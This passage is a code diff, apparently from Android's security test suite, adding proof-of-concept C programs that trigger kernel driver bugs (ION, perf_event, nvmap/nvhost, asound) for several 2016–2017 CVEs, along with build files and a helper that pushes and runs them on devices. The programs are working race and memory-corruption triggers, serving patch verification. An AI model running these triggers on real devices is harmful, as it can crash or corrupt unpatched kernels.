+#define NVHOST_IOCTL_CHANNEL_SUBMIT \
+ _IOWR(NVHOST_IOCTL_MAGIC, 26, struct nvhost_submit_args)
+
+struct nvhost_syncpt_incr {
+ __u32 syncpt_id;
+ __u32 syncpt_incrs;
+};
+
+#define CLOSE_THREAD_NUM 1
+#define TRY_TIMES 2
+#define NVMAPDEV "/dev/nvmap"
+#define VICDEV "/dev/nvhost-vic"
+#define SYNC_NUM 1
+struct nvhost_set_error_notifier err1 = { 0 }, err2 = { 0 };
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+int nvmap, vic;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ int ret;
+ set_affinity(1);
+
+ while(attack){
+ ret = ioctl(vic, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &err1);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, j, ret;
+ int dma1, dma2;
+ struct nvmap_create_handle args = {
+ .size = PAGE_SIZE
+ };
+ struct nvmap_alloc_handle alloc = {
+ .heap_mask = 0xFFFFFFFF
+ };
+
+ struct nvhost_syncpt_incr incr[SYNC_NUM];
+
+ struct nvhost_submit_args submit = {
+ .num_syncpt_incrs = SYNC_NUM,
+ .syncpt_incrs = (intptr_t)incr,
+ .timeout = 1,
+ //.class_ids = (intptr_t)&ret
+ };
+
+ memset(incr, 0, sizeof(incr));
+ incr[0].syncpt_id = 6;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ nvmap = open(NVMAPDEV, O_RDONLY);
+ if(nvmap == -1)
+ ERR("[-] open %s failed", NVMAPDEV);
+ else
+ LOG("[+] open %s OK", NVMAPDEV);
+
+ vic = open(VICDEV, O_RDONLY);
+ if(vic == -1)
+ ERR("[-] open %s failed", VICDEV);
+ else
+ LOG("[+] open %s OK", VICDEV);
+
+ // prepare
+ ret = ioctl(nvmap, NVMAP_IOC_CREATE, &args);
+ if(ret)
+ ERR("[-] ioctl NVMAP_IOC_CREATE failed");
+ else
+ LOG("[+] NVMAP_IOC_CREATE succeeded, fd = %d", args.handle);
+
+ dma1 = args.handle;
+ err1.mem = dma1;
+ alloc.handle = dma1;
+
+ ret = ioctl(nvmap, NVMAP_IOC_ALLOC, &alloc);
+ if(ret)
+ ERR("[-] ioctl NVMAP_IOC_ALLOC failed");
+ else
+ LOG("[+] NVMAP_IOC_ALLOC succeeded");
+
+ /* create close thread */
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ }
+ LOG("[+] running...");
+ while(1) {
+ ret = ioctl(vic, NVHOST_IOCTL_CHANNEL_SUBMIT, &submit);
+ }
+
+ LOG("[-] passed :(");
+ attack = 0;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++) {
+ pthread_join(close_thread_id[i], NULL);
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
new file mode 100644
index 0000000..95ddb3d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-9120
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
new file mode 100644
index 0000000..c03ee45
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
@@ -0,0 +1,175 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <errno.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+typedef int ion_user_handle_t;
+
+enum ion_heap_type {
+ ION_HEAP_TYPE_SYSTEM,
+ ION_HEAP_TYPE_SYSTEM_CONTIG,
+ ION_HEAP_TYPE_CARVEOUT,
+ ION_HEAP_TYPE_CHUNK,
+ ION_HEAP_TYPE_DMA,
+ ION_HEAP_TYPE_CUSTOM, /* must be last so device specific heaps always
+ are at the end of this enum */
+ ION_NUM_HEAPS = 16,
+};
+
+#define ION_HEAP_SYSTEM_MASK (1 << ION_HEAP_TYPE_SYSTEM)
+#define ION_HEAP_SYSTEM_CONTIG_MASK (1 << ION_HEAP_TYPE_SYSTEM_CONTIG)
+#define ION_HEAP_CARVEOUT_MASK (1 << ION_HEAP_TYPE_CARVEOUT)
+#define ION_HEAP_TYPE_DMA_MASK (1 << ION_HEAP_TYPE_DMA)
+
+#define ION_NUM_HEAP_IDS sizeof(unsigned int) * 8
+
+struct ion_allocation_data {
+ size_t len;
+ size_t align;
+ unsigned int heap_id_mask;
+ unsigned int flags;
+ ion_user_handle_t handle;
+};
+
+
+struct ion_fd_data {
+ ion_user_handle_t handle;
+ int fd;
+};
+
+
+struct ion_handle_data {
+ ion_user_handle_t handle;
+};
+
+
+struct ion_custom_data {
+ unsigned int cmd;
+ unsigned long arg;
+};
+#define ION_IOC_MAGIC 'I'
+
+#define ION_IOC_ALLOC _IOWR(ION_IOC_MAGIC, 0, \
+ struct ion_allocation_data)
+
+#define ION_IOC_FREE _IOWR(ION_IOC_MAGIC, 1, struct ion_handle_data)
+
+
+#define ION_FLAG_CACHED 1 /* mappings of this buffer should be
+ cached, ion will do cache
+ maintenance when the buffer is
+ mapped for dma */
+#define ION_FLAG_CACHED_NEEDS_SYNC 2 /* mappings of this buffer will created
+ at mmap time, if this is set
+ caches must be managed manually */
+
+int g_fd = -1;
+struct ion_allocation_data* g_allocation = NULL;
+struct ion_handle_data g_free_data;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+int open_driver() {
+ char* dev_path = "/dev/ion";
+ g_fd = open(dev_path, O_RDONLY);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void prepare_data() {
+ void* data = malloc(0x1000);
+
+ g_allocation = (struct ion_allocation_data*)data;
+
+ g_allocation->len = 0x1000;
+ g_allocation->align = 8;
+ g_allocation->heap_id_mask = 1 << 25;
+ g_allocation->flags = ION_FLAG_CACHED;
+ g_allocation->handle = -1;
+
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+
+ g_free_data.handle = 1;
+}
+
+void trigger_ion_alloc() {
+ ioctl(g_fd, ION_IOC_ALLOC, g_allocation);
+}
+
+void trigger_ion_free() {
+ ioctl(g_fd, ION_IOC_FREE, &g_free_data);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ while (1) {
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ trigger_ion_free();
+ pthread_mutex_unlock(&mutex);
+ }
+
+}
+
+
+int main(int argc, char**argv) {
+ if (open_driver() < 0) {
+ return -1;
+ }
+ setup_privi_and_affinity(0, 1);
+ prepare_data();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ sleep(1);
+ while (1) {
+ pthread_cond_signal(&cond);
+ usleep(100);
+ trigger_ion_alloc();
+ sleep(1);
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
new file mode 100644
index 0000000..cb31e4d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0403
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
new file mode 100644
index 0000000..51095e7
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
@@ -0,0 +1,233 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+//overwrite object+0x20,like a list initilize
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <sys/wait.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+
+
+struct perf_event_attr {
+
+ /*
+ * Major type: hardware/software/tracepoint/etc.
+ */
+ __u32 type;
+
+ /*
+ * Size of the attr structure, for fwd/bwd compat.
+ */
+ __u32 size;
+
+ /*
+ * Type specific configuration information.
+ */
+ __u64 config;
+
+ union {
+ __u64 sample_period;
+ __u64 sample_freq;
+ };
+
+ __u64 sample_type;
+ __u64 read_format;
+
+ __u64 disabled : 1, /* off by default */
+ inherit : 1, /* children inherit it */
+ pinned : 1, /* must always be on PMU */
+ exclusive : 1, /* only group on PMU */
+ exclude_user : 1, /* don't count user */
+ exclude_kernel : 1, /* ditto kernel */
+ exclude_hv : 1, /* ditto hypervisor */
+ exclude_idle : 1, /* don't count when idle */
+ mmap : 1, /* include mmap data */
+ comm : 1, /* include comm data */
+ freq : 1, /* use freq, not period */
+ inherit_stat : 1, /* per task counts */
+ enable_on_exec : 1, /* next exec enables */
+ task : 1, /* trace fork/exit */
+ watermark : 1, /* wakeup_watermark */
+ /*
+ * precise_ip:
+ *
+ * 0 - SAMPLE_IP can have arbitrary skid
+ * 1 - SAMPLE_IP must have constant skid
+ * 2 - SAMPLE_IP requested to have 0 skid
+ * 3 - SAMPLE_IP must have 0 skid
+ *
+ * See also PERF_RECORD_MISC_EXACT_IP
+ */
+ precise_ip : 2, /* skid constraint */
+ mmap_data : 1, /* non-exec mmap data */
+ sample_id_all : 1, /* sample_type all events */
+
+ exclude_host : 1, /* don't count in host */
+ exclude_guest : 1, /* don't count in guest */
+
+ exclude_callchain_kernel : 1, /* exclude kernel callchains */
+ exclude_callchain_user : 1, /* exclude user callchains */
+ constraint_duplicate : 1,
+
+ __reserved_1 : 40;
+
+ union {
+ __u32 wakeup_events; /* wakeup every n events */
+ __u32 wakeup_watermark; /* bytes before wakeup */
+ };
+
+ __u32 bp_type;
+ union {
+ __u64 bp_addr;
+ __u64 config1; /* extension of config */
+ };
+ union {
+ __u64 bp_len;
+ __u64 config2; /* extension of config1 */
+ };
+ __u64 branch_sample_type; /* enum perf_branch_sample_type */
+
+ /*
+ * Defines set of user regs to dump on samples.
+ * See asm/perf_regs.h for details.
+ */
+ __u64 sample_regs_user;
+
+ /*
+ * Defines size of the user stack to dump on samples.
+ */
+ __u32 sample_stack_user;
+
+ /* Align to u64. */
+ __u32 __reserved_2;
+};
+
+
+#define PAIR_FD 1
+
+int group_fd[PAIR_FD],child_fd[PAIR_FD];
+
+long created = 0;
+long freed = 0;
+long finished = 0;
+
+void *thr(void *arg) {
+ printf("id=%d arg=%d\n",gettid(),arg);
+
+ int i;
+ struct perf_event_attr attr;
+
+ switch ((long)arg) {
+ case 0:
+ //#16123
+ printf("thread 0\n");
+ memset(&attr,0,sizeof(struct perf_event_attr));
+ attr.type = 1;
+ attr.size = sizeof(struct perf_event_attr);
+ attr.config = 1;
+
+ group_fd[0] = syscall(__NR_perf_event_open, &attr, 0x0ul, -1,
+ -1, 0x1ul, 0);
+
+ if(group_fd[0]<0){
+ perror("perf-group:");
+ }
+
+
+ memset(&attr,0,sizeof(struct perf_event_attr));
+ attr.type = 1;
+ attr.size = sizeof(struct perf_event_attr);
+ attr.config = 5;
+
+ child_fd[0] = syscall(__NR_perf_event_open, &attr,0x0ul, 0x6ul, group_fd[0], 0x0ul, 0);
+
+ if(group_fd[0]<0){
+ perror("perf-child:");
+ }
+
+ created = 1;
+ break;
+ case 1:
+
+ while(!created){
+ sleep(1);
+ }
+
+ printf("thread 1\n");
+ close(group_fd[0]);
+
+ freed = 1;
+
+ break;
+ case 2:
+
+ printf("thread 2\n");
+
+ while(!freed){
+ sleep(1);
+ }
+
+ close(child_fd[0]);
+
+ finished = 1;
+
+ break;
+
+ }
+ return 0;
+}
+
+int poc() {
+ long i;
+ pthread_t th[5];
+ for (i = 0; i < 3; i++) {
+ pthread_create(&th[i], 0, thr, (void *)i);
+ usleep(10000);
+ }
+
+ while(!finished){
+ sleep(1);
+ }
+
+ return 0;
+}
+
+
+int main(int argc, char const *argv[])
+{
+ int pid;
+ unsigned int times;
+ times = 0;
+ printf("POC3\n");
+ printf("Please enable CONFIG_SLUB_DEBUG_ON and check the posion overwriten message in kernel\n");
+ fflush(stdout);
+
+ // while(1){
+ pid = fork();
+ if(pid){
+ int status;
+ int ret = waitpid(pid,&status,0);
+
+ printf("[%d]times.\r",times);
+ times++;
+ }else
+ return poc();
+ // }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
new file mode 100644
index 0000000..9e30d30
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0404
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
new file mode 100644
index 0000000..54821ef
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/prctl.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <pthread.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <semaphore.h>
+#include <sys/socket.h>
+#include <sys/mman.h>
+#include <signal.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <sys/utsname.h>
+#include <sys/ptrace.h>
+
+char buf[4096];
+
+int main(int argc, char const *argv[]){
+ memset(buf, 0xa0, sizeof(buf));
+
+ int fd = open("/proc/asound/version", O_RDWR);
+ if(fd != -1){
+ lseek(fd, 0x1234567800000000, SEEK_SET);
+ write(fd, buf, sizeof(buf));
+ }else{
+ perror("open error\n");
+ }
+ close(fd);
+ return 0;
+}
\ No newline at end of file
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
new file mode 100644
index 0000000..afb77b4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0429
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
new file mode 100644
index 0000000..4ef1b3e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
@@ -0,0 +1,179 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%d)\n", ##__VA_ARGS__, errno, errno)
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+#define NVMAP_IOC_MAGIC 'N'
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+#define SZ_128K 0x00020000
+#define NVHOST_AS_IOCTL_MAGIC 'A'
+struct nvhost_as_bind_channel_args {
+ __u32 channel_fd; /* in */
+} __packed;
+#define NVHOST_AS_IOCTL_BIND_CHANNEL \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 1, struct nvhost_as_bind_channel_args)
+
+struct nvhost_as_free_space_args {
+ __u64 offset; /* in, byte address */
+ __u32 pages; /* in, pages */
+ __u32 page_size; /* in, bytes */
+};
+#define NVHOST_AS_IOCTL_FREE_SPACE \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 3, struct nvhost_as_free_space_args)
+
+#define NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE 0x2
+struct nvhost_as_alloc_space_args {
+ __u32 pages; /* in, pages */
+ __u32 page_size; /* in, bytes */
+ __u32 flags; /* in */
+ __u32 padding; /* in */
+ union {
+ __u64 offset; /* inout, byte address valid iff _FIXED_OFFSET */
+ __u64 align; /* in, alignment multiple (0:={1 or n/a}) */
+ } o_a;
+};
+#define NVHOST_AS_IOCTL_ALLOC_SPACE \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 6, struct nvhost_as_alloc_space_args)
+
+#define CLOSE_THREAD_NUM 1
+#define TRY_TIMES 2
+#define NVMAPDEV "/dev/nvmap"
+#define GPUDEV "/dev/nvhost-gpu"
+#define ASDEV "/dev/nvhost-as-gpu"
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+int nvmap, gpu, asgpu;
+volatile int attack;
+
+int main(void)
+{
+ int i, j, ret;
+ int dma1, dma2;
+ struct nvmap_create_handle args = {
+ .size = PAGE_SIZE
+ };
+ struct nvhost_as_bind_channel_args as_bind = { 0 };
+ struct nvhost_as_alloc_space_args alloc = {
+ .pages = 1,
+ .page_size = SZ_128K,
+ .flags = NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE
+ };
+ struct nvhost_as_free_space_args free_arg = {
+ .pages = 1,
+ .page_size = SZ_128K
+ };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ nvmap = open(NVMAPDEV, O_RDONLY);
+ if(nvmap == -1) {
+ ERR("[-] open %s failed", NVMAPDEV);
+ goto __cleanup;
+ }
+ gpu = open(GPUDEV, O_RDONLY);
+ if(gpu == -1) {
+ ERR("[-] open %s failed", GPUDEV);
+ goto __cleanup;
+ }
+ asgpu = open(ASDEV, O_RDONLY);
+ if(asgpu == -1) {
+ ERR("[-] open %s failed", ASDEV);
+ goto __cleanup;
+ }
+ // bind the channel
+ as_bind.channel_fd = gpu;
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_BIND_CHANNEL, &as_bind);
+ if(ret == -1) {
+ ERR("[-] NVHOST_AS_IOCTL_BIND_CHANNEL failed");
+ goto __cleanup;
+ } else {
+ //LOG("[+] ioctl OK, channel is bond");
+ }
+
+ #if 1
+ // prepare
+ ret = ioctl(nvmap, NVMAP_IOC_CREATE, &args);
+ if(ret) {
+ ERR("[-] NVMAP_IOC_CREATE failed");
+ goto __cleanup;
+ }
+ #endif
+
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_ALLOC_SPACE, &alloc);
+ if(ret) {
+ ERR("[-] NVHOST_AS_IOCTL_ALLOC_SPACE failed");
+ goto __cleanup;
+ }
+ free_arg.offset = alloc.o_a.offset;
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_FREE_SPACE, &free_arg);
+ if(ret) {
+ ERR("[-] NVHOST_AS_IOCTL_FREE_SPACE failed");
+ goto __cleanup;
+ }
+
+__cleanup:
+ close(nvmap);
+ close(gpu);
+ close(asgpu);
+ return 0;
+}
diff --git a/hostsidetests/security/src/android/security/cts/AdbUtils.java b/hostsidetests/security/src/android/security/cts/AdbUtils.java
index a3018fa..fa9934f 100644
--- a/hostsidetests/security/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/security/src/android/security/cts/AdbUtils.java
@@ -30,6 +30,7 @@
import java.io.InputStream;
import java.io.OutputStream;
import java.util.Scanner;
+import java.util.concurrent.TimeUnit;
public class AdbUtils {
@@ -39,8 +40,7 @@
* @param device device for the command to be ran on
* @return the console output from running the command
*/
- public static String runCommandLine(String command, ITestDevice device) throws Exception
- {
+ public static String runCommandLine(String command, ITestDevice device) throws Exception {
return device.executeShellCommand(command);
}
@@ -51,17 +51,25 @@
* @param device device to be ran on
* @return the console output from the binary
*/
- public static String runPoc(String pathToPoc, ITestDevice device) throws Exception {
- String fullResourceName = pathToPoc;
- File pocFile = File.createTempFile("poc", "");
- try {
- pocFile = extractResource(fullResourceName, pocFile);
- device.pushFile(pocFile, "/data/local/tmp/poc");
- device.executeShellCommand("chmod +x /data/local/tmp/poc");
- return device.executeShellCommand("/data/local/tmp/poc");
- } finally {
- pocFile.delete();
- }
+ public static String runPoc(String pocName, ITestDevice device) throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ return device.executeShellCommand("/data/local/tmp/" + pocName);
+ }
+
+ /**
+ * Pushes and runs a binary to the selected device
+ *
+ * @param pathToPoc a string path to poc from the /res folder
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ * @return the console output from the binary
+ */
